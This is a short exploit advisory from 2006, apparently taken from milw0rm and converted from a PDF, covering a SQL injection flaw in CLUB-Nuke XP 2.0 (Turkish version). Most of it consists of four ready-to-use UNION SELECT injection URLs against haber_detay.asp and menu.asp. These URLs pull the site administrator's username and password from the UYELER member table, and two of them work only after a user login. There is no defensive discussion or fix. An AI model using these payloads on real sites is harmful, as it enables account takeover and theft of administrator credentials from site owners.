CLUBNuke XP 2.0 LCID 2048 Turkish Version SQL Injection.pdf

1 # CLUB−Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability 2 # Risk : High 3 # Credit : ASIANEAGLE 4 # Contact: admin@asianeagle.org 5 # Web : www.asianeagle.org 6 # Download Link : http://www.aspindir.com/Kategoriler/asp/portal−&−hazir−site/?P=7&K=&T= 7 8 9 #Exploit: 10 Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability 11 12 #Admin Nick: http://[SITE]/club−nuke path/haber_detay.asp?haber_id=−1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20U YELER%20where%20U_ID%20like%201 13 14 #Admin Password :http::[SITE]/club−nuke path/haber_detay.asp?haber_id=−1%20union%20select%200,1,U_SIFRE,3,4,5,6%20fro m%20UYELER%20where%20U_ID%20like%201 15 16 after login as user; 17 18 #Admin Nick : http://[SITE]/club−nuke path/menu.asp?menu_id=−1%20union%20select%200,1,U_ADI,3,4,5%20from%20UYELER% 20where%20U_ID%20like%201 19 20 #Admin Password: http://[SITE]/club−nuke path/menu.asp?menu_id=−1%20union%20select%200,1,U_SIFRE,3,4,5%20from%20UYELE R%20where%20U_ID%20like%201 21 22 #Forever milw0rm ;) 23 24 # milw0rm.com [2006−08−08] Page 1/1 CLUBNuke XP 2.0 LCID 2048 Turkish Version SQL Injection ASIANEAGLE 08/08/2006